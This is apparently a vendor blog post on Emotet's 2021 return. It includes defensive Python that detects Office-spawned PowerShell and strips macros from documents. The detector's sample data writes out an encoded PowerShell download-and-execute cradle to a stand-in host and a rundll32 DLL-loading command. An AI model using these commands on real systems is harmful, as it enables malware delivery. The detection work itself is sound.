Published On: November 25, 2021

Emotet strikes again

Computers infected with TrickBot are at risk

The German Federal Criminal Police Office (BKA) calls it the “most dangerous malware in the world”

Not even a year after authorities shut down Emotet's infrastructure in January 2021, security researcher Brad Duncan reported its return. Since around November 15, 2021, there have been signs that one of the most dangerous and successful Trojans is being distributed again, at first to machines already infected with TrickBot, with its spam campaigns resuming shortly afterwards to push malicious code into companies and open the door to ransomware.

The attackers often make the spam look like routine correspondence about payments, or even like a reply within an existing email thread. Once the attached document (or the document behind a link in the email) is opened and its content is enabled, the malicious macros or JavaScript it carries launch PowerShell, which downloads the Emotet loader and starts it. For tips on which files and lures to watch out for, see Malwarebytes' write-up and Brad Duncan's blog post.
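The delivery chain just described, an Office application spawning PowerShell, is the single most useful thing to alert on. The following is an added example (not GBS or iQ.Suite code) that runs that check over process-creation events and decodes any -EncodedCommand payload for the analyst. The input records are constructed here using Sysmon Event ID 1 field names (ParentImage, Image, CommandLine, User); the paths, user names, URL and payload are invented sample data.

```python
import base64
import re

# Process pairs that match the delivery chain: an Office application launching
# a script host. (Added example; not GBS or iQ.Suite code.)
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -enc, ...); the argument is base64 of a UTF-16LE string.
ENCODED_ARG = re.compile(r"(?i)-e(?:ncodedcommand|nco|nc|n|c)?\s+([A-Za-z0-9+/=]+)")


def exe_name(path):
    """Lower-cased file name of a Windows path (...\\WINWORD.EXE -> winword.exe)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return an alert dict for an Office -> script-host spawn, else None."""
    parent, child = exe_name(event["ParentImage"]), exe_name(event["Image"])
    if parent not in OFFICE_APPS or child not in SCRIPT_HOSTS:
        return None
    return {
        "parent": parent,
        "child": child,
        "user": event.get("User"),
        "command": event["CommandLine"],
        "decoded": decode_encoded_command(event["CommandLine"]),
    }


def scan(events):
    """Run evaluate() over a batch of events and return only the alerts."""
    return [alert for alert in map(evaluate, events) if alert]


# --- Constructed sample data (invented paths, user names, URL and payload) ---
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/a')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # Word macro running an encoded PowerShell download cradle: alert
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": f"powershell -nop -w hidden -enc {ENCODED}",
        "User": r"CORP\jdoe",
    },
    {   # Administrator running a script from Explorer: benign, no alert
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
        "User": r"CORP\admin",
    },
    {   # Excel spawning cmd.exe to load a DLL from a public folder: alert
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "Image": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"cmd /c rundll32 C:\Users\Public\inv.dll,DllRegisterServer",
        "User": r"CORP\jdoe",
    },
    {   # Outlook handing an attachment to Word: normal, no alert
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
        "Image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": r'"WINWORD.EXE" /n "C:\Users\jdoe\AppData\Local\Temp\Invoice.docm"',
        "User": r"CORP\jdoe",
    },
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"ALERT {alert['parent']} -> {alert['child']} ({alert['user']})")
        if alert["decoded"]:
            print("  decoded:", alert["decoded"])
```

The parent/child pairing is what makes this rule low-noise: PowerShell launched from Explorer or a scheduled task is everyday administration, PowerShell launched by Word almost never is. Decoding the argument matters because the encoded form hides the download URL from simple string matching on the command line.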

The evolution of Emotet

When it emerged in 2014, Emotet was primarily a banking Trojan that stole private data, above all online banking credentials, and used worm-like modules to spread across a network. In 2016 and 2017, however, it evolved into one of the most expensive spam and malware threats: a loader that let other criminal crews drop their own malware, such as TrickBot or Qbot, onto already infected computers, which in turn often ended in a ransomware deployment.

In January 2021, the German Federal Criminal Police Office (BKA), together with law enforcement agencies from seven other countries, took out what they called "the most dangerous malware in the world." Yet the joy didn't last long. On November 15, security researcher Brad Duncan reported signs that Emotet was back when machines already infected with TrickBot began downloading Emotet files. Shortly afterwards the familiar spam campaigns followed: malicious macros hidden in Word or Excel documents, or in a password-protected ZIP archive containing a Word file, which an email scanner cannot open to inspect.

Is there a protection that really works?

What does the return of this extremely dangerous malware mean for businesses? First of all, they need to be able to detect Emotet on their systems. Even if, for the moment, mainly computers already infected with TrickBot are affected, the spam campaigns have resumed and it is quite likely that the delivery mechanism will keep evolving and put everyone at risk. As the Federal Criminal Police Office itself recommends, the most effective prevention is to restrict macros: allow only digitally signed macros, and block them entirely where they are not needed.

With iQ.Suite against Emotet
GBS has been a leading provider of email security solutions for 30 years, and our experts are committed to developing solutions that eliminate the risk of existing and future threats. iQ.Suite, GBS' leading email security product, and its cloud-hosted as-a-service version, iQ.Suite aaS, provide comprehensive protection against a wide range of attack types. The Convert module of iQ.Suite can be used alone or in combination with Watchdog and Wall to neutralize potential threats. It follows a three-step process to protect against Trojans and other malware, converting malicious email attachments in order to defuse them.

    • Step 1: Identify dangerous content

In combination with Watchdog, the Convert module can identify harmful files. iQ.Suite Convert removes the potentially dangerous macros and delivers the clean file to the recipient.

    • Step 2: Convert to PDF to eliminate macros

Emails containing potentially dangerous Office documents can be stopped and converted to PDF format with iQ.Suite Convert. The recipient receives the original attachment as a PDF file. Because only the rendered content is carried over, the conversion strips ransomware droppers, encryption Trojans and malicious macros from Office files, along with hidden information such as revision history. Active malicious code no longer poses a threat. If the file is deemed non-threatening, it is delivered in its original format.

    • Step 3: Centralized compression to save space

Whether sending or receiving, the transfer of email attachments, especially large files, places a burden on the network infrastructure and takes up valuable storage capacity. With flexible rules, email attachments are compressed centrally on the server and converted to ZIP format. This results in smaller mailboxes and improved performance in your email infrastructure.
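The identify-then-defuse idea behind Steps 1 and 2, as an added example in Python that is not iQ.Suite code: it recognises macro-enabled OOXML attachments (and password-protected archives it cannot look into), and rebuilds a Word or Excel package without its VBA project. The sample .docm is constructed in memory from a minimal OOXML skeleton with a dummy vbaProject.bin; its contents are invented. Real documents carry many more parts, but the macro project is referenced from the same three places handled here.

```python
import io
import re
import zipfile

VBA_PART_SUFFIX = "vbaproject.bin"
# OOXML main-part content types: macro-enabled -> equivalent macro-free type.
MACRO_TO_PLAIN = {
    "application/vnd.ms-word.document.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml",
    "application/vnd.ms-excel.sheet.macroEnabled.main+xml":
        "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml",
}


def build_sample_docm():
    """Constructed sample: a minimal Word package carrying a (dummy) VBA project."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
            '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
            '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
            '<Default Extension="xml" ContentType="application/xml"/>'
            '<Default Extension="bin" ContentType="application/vnd.ms-office.vbaProject"/>'
            '<Override PartName="/word/document.xml" '
            'ContentType="application/vnd.ms-word.document.macroEnabled.main+xml"/>'
            "</Types>")
        z.writestr("word/document.xml",
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
            "<w:body><w:p><w:r><w:t>Invoice attached</w:t></w:r></w:p></w:body></w:document>")
        z.writestr("word/_rels/document.xml.rels",
            '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
            '<Relationship Id="rId1" Target="vbaProject.bin" '
            'Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject"/>'
            "</Relationships>")
        # A real VBA project is an OLE2 compound file; only its header is mimicked.
        z.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"dummy VBA")
    return buf.getvalue()


def mark_encrypted(data):
    """Constructed sample: set bit 0 (encrypted) of the general-purpose flag in
    every local header and central-directory entry, which is what a
    password-protected ZIP looks like to a scanner. zipfile cannot write
    encrypted archives, so the flag is patched into the raw bytes instead."""
    buf = bytearray(data)
    for signature, flag_offset in ((b"PK\x03\x04", 6), (b"PK\x01\x02", 8)):
        pos = buf.find(signature)
        while pos != -1:
            buf[pos + flag_offset] |= 0x1
            pos = buf.find(signature, pos + 4)
    return bytes(buf)


def inspect(data):
    """Step 1: classify an attachment. An encrypted archive cannot be looked
    into, so a gateway should treat it as unverified, never as clean."""
    result = {"zip": False, "encrypted": False, "vba_part": False, "macro_type": False}
    try:
        z = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return result
    names = z.namelist()
    result["zip"] = True
    result["encrypted"] = any(i.flag_bits & 0x1 for i in z.infolist())
    result["vba_part"] = any(n.lower().endswith(VBA_PART_SUFFIX) for n in names)
    if not result["encrypted"] and "[Content_Types].xml" in names:
        types_xml = z.read("[Content_Types].xml").decode("utf-8", "replace")
        result["macro_type"] = any(t in types_xml for t in MACRO_TO_PLAIN)
    return result


def strip_macros(data):
    """Step 2 (simplified): rebuild the package without the VBA project, drop
    its relationship and content-type entries, and switch the main part back
    to the macro-free type so Office treats the result as a plain document."""
    src = zipfile.ZipFile(io.BytesIO(data))
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for name in src.namelist():
            if name.lower().endswith(VBA_PART_SUFFIX):
                continue
            body = src.read(name)
            if name == "[Content_Types].xml" or name.endswith(".rels"):
                text = body.decode("utf-8")
                for macro_type, plain_type in MACRO_TO_PLAIN.items():
                    text = text.replace(macro_type, plain_type)
                text = re.sub(r"<Default [^>]*vnd\.ms-office\.vbaProject[^>]*/>", "", text)
                text = re.sub(r"<Relationship [^>]*relationships/vbaProject[^>]*/>", "", text)
                body = text.encode("utf-8")
            dst.writestr(name, body)
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample_docm()
    print("original :", inspect(sample))
    print("encrypted:", inspect(mark_encrypted(sample)))
    print("defused  :", inspect(strip_macros(sample)))
```

This only covers the OOXML formats (.docm, .xlsm); legacy binary .doc and .xls files are OLE2 containers and need a parser such as the olevba tool from oletools. A password-protected ZIP must be blocked or quarantined rather than passed through, because the scanner has no way to see what is inside. Rendering the document to PDF, as Step 2 does, goes further than macro removal: it also discards OLE objects, DDE fields and other active content that stripping the VBA project alone leaves in place.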

Whether you choose iQ.Suite or take other measures, it is important to implement strong email security. Assuming that it won't happen to you is more dangerous than Emotet, the king of malware, itself.